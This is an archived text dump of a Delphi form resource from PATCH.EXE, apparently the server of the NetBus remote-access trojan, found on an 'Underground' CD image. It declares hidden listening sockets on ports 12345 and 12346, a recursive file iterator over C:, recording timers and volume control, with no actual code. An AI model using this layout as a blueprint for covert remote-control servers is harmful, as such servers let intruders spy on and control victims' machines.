home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / other / progsy / netbus / PATCH.EXE / 0 / RCDATA / TMAINFORM2 / TMAINFORM2.txt
Encoding:
Text File  |  1998-08-22  |  1.6 KB  |  75 lines

  1. object MainForm2: TMainForm2
  2.   Left = 192
  3.   Top = 107
  4.   Width = 302
  5.   Height = 171
  6.   Caption = 'MainForm2'
  7.   Font.Charset = DEFAULT_CHARSET
  8.   Font.Color = clWindowText
  9.   Font.Height = -11
  10.   Font.Name = 'MS Sans Serif'
  11.   Font.Style = []
  12.   OnCreate = FormCreate
  13.   OnDestroy = FormDestroy
  14.   PixelsPerInch = 96
  15.   TextHeight = 13
  16.   object MediaPlayer1: TMediaPlayer
  17.     Left = 16
  18.     Top = 88
  19.     Width = 253
  20.     Height = 33
  21.     Visible = False
  22.     TabOrder = 0
  23.   end
  24.   object ServerSock: TServerSocket
  25.     Active = False
  26.     Port = 12345
  27.     ServerType = stNonBlocking
  28.     OnClientConnect = ServerSockClientConnect
  29.     OnClientDisconnect = ServerSockClientDisconnect
  30.     OnClientRead = ServerSockClientRead
  31.     OnClientError = ServerSockClientError
  32.     Left = 24
  33.     Top = 16
  34.   end
  35.   object ServerSock2: TServerSocket
  36.     Active = False
  37.     Port = 12346
  38.     ServerType = stThreadBlocking
  39.     OnGetThread = ServerSock2GetThread
  40.     OnClientError = ServerSock2ClientError
  41.     Left = 56
  42.     Top = 16
  43.   end
  44.   object DelayTimer: TTimer
  45.     Enabled = False
  46.     OnTimer = DelayTimerTimer
  47.     Left = 88
  48.     Top = 16
  49.   end
  50.   object RecordTimer: TTimer
  51.     Enabled = False
  52.     OnTimer = RecordTimerTimer
  53.     Left = 120
  54.     Top = 16
  55.   end
  56.   object FileIterator1: TFileIterator
  57.     Options = [fiPath, fiDetails, fiRecurseFolders]
  58.     RootFolder = 'C:'
  59.     OnAddFile = FileIterator1AddFile
  60.     OnNewDirectory = FileIterator1NewDirectory
  61.     OnTerminate = FileIterator1Terminate
  62.     Left = 24
  63.     Top = 48
  64.   end
  65.   object DriveList1: TDriveList
  66.     Left = 56
  67.     Top = 48
  68.   end
  69.   object VolumeControl1: TVolumeControl
  70.     Interval = 0
  71.     Left = 88
  72.     Top = 48
  73.   end
  74. end
  75.